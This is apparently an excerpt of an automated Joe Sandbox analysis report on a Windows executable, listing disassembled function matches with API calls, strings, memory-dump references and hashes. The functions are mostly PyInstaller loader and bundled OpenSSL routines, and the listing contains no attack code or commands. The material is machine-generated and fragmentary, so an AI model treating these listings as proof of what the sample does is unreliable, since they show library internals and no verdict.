                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$create_ticket_prequel
                                                                                                                                                                                                                            • API String ID: 193678381-2110699330
                                                                                                                                                                                                                            • Opcode ID: e06727b8e6375174c0208e619049dbcc885a0041a93c4ae4b65a804a49454f3d
                                                                                                                                                                                                                            • Instruction ID: 9709255808ac26e677aeaa56d12191070b2f1085adb84e085006e71147a93132
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e06727b8e6375174c0208e619049dbcc885a0041a93c4ae4b65a804a49454f3d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0417120B1C68289F7549A22E8A1FB92750EB85B84F544631DE7EC7ADEDE2DE9418700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_indentO_printf
                                                                                                                                                                                                                            • String ID: ,$NamedGroup: %s (%d)$UNKNOWN$key_exchange:
                                                                                                                                                                                                                            • API String ID: 1860387303-2250237447
                                                                                                                                                                                                                            • Opcode ID: 0641e6cc35b3c44cb9c6518ae0513edfde36eb4bbc4393359f871d520734044d
                                                                                                                                                                                                                            • Instruction ID: 02af5ed1fe844948c8535df357059e60c5de7ce89647e25633d9f0d884b4f4e0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0641e6cc35b3c44cb9c6518ae0513edfde36eb4bbc4393359f871d520734044d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2041D763B0D6A245EB148B12A438DB96B91AB41780F854332DDBED73C9EE3DF542C704
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                            • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                            • API String ID: 2895956056-699529898
                                                                                                                                                                                                                            • Opcode ID: bad98a2e6fff8929db7f8baee1eb0b6edf4e9f8e86b040b8313d0eea73b8bd2b
                                                                                                                                                                                                                            • Instruction ID: 90ba3ad141af14384b1a085431f9e99838602150f9cc0e0227781e7c16ddf57f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bad98a2e6fff8929db7f8baee1eb0b6edf4e9f8e86b040b8313d0eea73b8bd2b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A413131A0878285EB209B65F4452AEB7A0FF89378F600335E6AD877D6DFBCD0548B40
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$R_set_error$Y_freeY_get_security_bits
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c$ssl3_ctx_ctrl
                                                                                                                                                                                                                            • API String ID: 3247900180-780421027
                                                                                                                                                                                                                            • Opcode ID: cf3535a55e2d6c7fe94a94c1794b78ceedf774a3b80580de09ebf95b179a120c
                                                                                                                                                                                                                            • Instruction ID: 42f14f7e50c16dd16fb6b81f7deef5823d855a33c89659e4165836092cf5ebbb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf3535a55e2d6c7fe94a94c1794b78ceedf774a3b80580de09ebf95b179a120c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB018E51B1D84286FB449351A572AB943519F81394FC84231DE3DC66CFED2CE5418B00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                            • Opcode ID: ad2eac301c283c78c5a486e2d323c9c7bba1650ce64e647d15fee4f7d5c41a3a
                                                                                                                                                                                                                            • Instruction ID: 93098e32f870effb9facc280b8d9133888da80a053ba9aa26927f05bb22821f4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad2eac301c283c78c5a486e2d323c9c7bba1650ce64e647d15fee4f7d5c41a3a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4D175329087418AEB20EB6AD4813AD7BA4FF557ACF200135EE4D97B96DF78E460C750
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6029ADF2A,?,?,0000017808186D18,00007FF6029A9BD3,?,?,?,00007FF6029A9ACA,?,?,?,00007FF6029A4F9E), ref: 00007FF6029ADD0C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6029ADF2A,?,?,0000017808186D18,00007FF6029A9BD3,?,?,?,00007FF6029A9ACA,?,?,?,00007FF6029A4F9E), ref: 00007FF6029ADD18
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                            • Opcode ID: f65bba0801ac06b96f2f3a4d918bbe6eed0efd0f6f5c7edcd61ac98fb66de638
                                                                                                                                                                                                                            • Instruction ID: 37b8f41db3b582c36bb714a0148e73a103e7023c6195ff2381ec3a7a31354a43
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f65bba0801ac06b96f2f3a4d918bbe6eed0efd0f6f5c7edcd61ac98fb66de638
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E341E521F19B0241FB16CB1798005752BA1BF49BA8FA85135DD0DC7B86EFFDE8458390
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF602993834), ref: 00007FF602997C34
                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF602993834), ref: 00007FF602997C7C
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997D60: GetEnvironmentVariableW.KERNEL32(00007FF60299365F), ref: 00007FF602997D97
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997D60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF602997DB9
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A70B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029A70C9
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029926C0: MessageBoxW.USER32 ref: 00007FF602992736
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                            • API String ID: 740614611-1339014028
                                                                                                                                                                                                                            • Opcode ID: fd22cb766a472744957bb80ea050f2533f84ee64c606121cb2f23662b2697a9d
                                                                                                                                                                                                                            • Instruction ID: 2564563cf5da7d49b9a4b7835d0df9a80b270be2010a6f9454b4957c05495515
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd22cb766a472744957bb80ea050f2533f84ee64c606121cb2f23662b2697a9d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2941A051E2964349FA20EB6B95552F95A51EF89BACF704032EE0EC77D7EEBCE5008240
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugX509i2d_
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_lib.c$ssl_add_cert_to_wpacket
                                                                                                                                                                                                                            • API String ID: 3356145284-2373850725
                                                                                                                                                                                                                            • Opcode ID: 7545746bfbf8784fbfdd62f01f2d4ca702a1ebd2b419c9790c8638fa1de03fd3
                                                                                                                                                                                                                            • Instruction ID: e9ed9bb2e8f085e92aaba44b9b8b27bed984bbc93c43888209c6b4bf0e5fcc1a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7545746bfbf8784fbfdd62f01f2d4ca702a1ebd2b419c9790c8638fa1de03fd3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67317521B0CB8285E7149712E460BAA6351AB85BC4F448231EE7DCBBDEDE6DE6418740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugX_freeX_new_from_nameY_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c$ssl_generate_param_group
                                                                                                                                                                                                                            • API String ID: 2173273376-2643799583
                                                                                                                                                                                                                            • Opcode ID: 363896e0a2a831b43094d1603262f4186dc98a409229c3000947fd7c93347a3f
                                                                                                                                                                                                                            • Instruction ID: 05238c96744541fe2cbaec22889812b49dcd00352a4115cb446041487aab0975
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 363896e0a2a831b43094d1603262f4186dc98a409229c3000947fd7c93347a3f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07219D61B1DB4241EB44EB16A861AA96350BF85B94F880231EE7EC77CFEE2CE4018740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_errorY_freeY_up_ref
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa.c$ssl_set_pkey
                                                                                                                                                                                                                            • API String ID: 4194652714-507513155
                                                                                                                                                                                                                            • Opcode ID: c566581f58e1a20692269512846b10992f1b0e00bdf86cd5d0764f38237cf847
                                                                                                                                                                                                                            • Instruction ID: 3ceadd4c126c57841b72c3e00432536ec2e4a6212a9f8ff21bd2cb70dc0c6468
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c566581f58e1a20692269512846b10992f1b0e00bdf86cd5d0764f38237cf847
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4421A562B18A8296EF449B15E4A06FD6320FB89784FD84231EB2DC37DAEF3DD5518700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: A_freePrivateR_newR_set_debugR_set_errord2i_
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa_legacy.c$SSL_use_RSAPrivateKey_ASN1
                                                                                                                                                                                                                            • API String ID: 3102899966-1618854237
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_peek_error
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3623038435-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$R_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$tls_construct_server_hello
                                                                                                                                                                                                                            • API String ID: 476316267-2775970066
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                            • String ID: a unicode character$argument$category
                                                                                                                                                                                                                            • API String ID: 1318908108-2068800536
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_cust.c$custom_ext_parse
                                                                                                                                                                                                                            • API String ID: 193678381-2402109875
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                            • String ID: a unicode character$argument$bidirectional
                                                                                                                                                                                                                            • API String ID: 1318908108-2110215792
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$tls_construct_stoc_status_request
                                                                                                                                                                                                                            • API String ID: 193678381-3916275234
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDBD
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDCB
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDF5
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CE63
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CE6F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$tls_construct_server_certificate
                                                                                                                                                                                                                            • API String ID: 193678381-3740638300
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_lib.c$ssl3_output_cert_chain
                                                                                                                                                                                                                            • API String ID: 193678381-603691555
                                                                                                                                                                                                                            • Opcode ID: 9d9e6cd5aa8a5f924eb8d1e6a2a44f34472bca1704abac81a1808de083805483
                                                                                                                                                                                                                            • Instruction ID: 1a09c048a594d92aade5d1c01b68ae6060834d73301a58ca4feeaf12ba2e4eba
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d9e6cd5aa8a5f924eb8d1e6a2a44f34472bca1704abac81a1808de083805483
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A214F11B1CA8241E744A752A971ABA5750AF857C0F884231EE3ECBBCFEE6CE5424B04
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: C_get_current_jobR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_do_handshake
                                                                                                                                                                                                                            • API String ID: 2134390360-2964568172
                                                                                                                                                                                                                            • Opcode ID: 3e19f5133db6f9f0995d995d45ee5f37c3958f709a5efffcd3d50ec949d9a66b
                                                                                                                                                                                                                            • Instruction ID: 630f704980922927ab5b4fcbac0472736938544186997a4d66a516671d587b11
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e19f5133db6f9f0995d995d45ee5f37c3958f709a5efffcd3d50ec949d9a66b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4021C122F0874242E745AB25E421AB96351AFC9794F5C0330EE7DC67CBDE2CE5818A40
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            • Opcode ID: 80df790e4dc20ce4daf526b56dc0de662265a938807179003cfdcd9a3866f9da
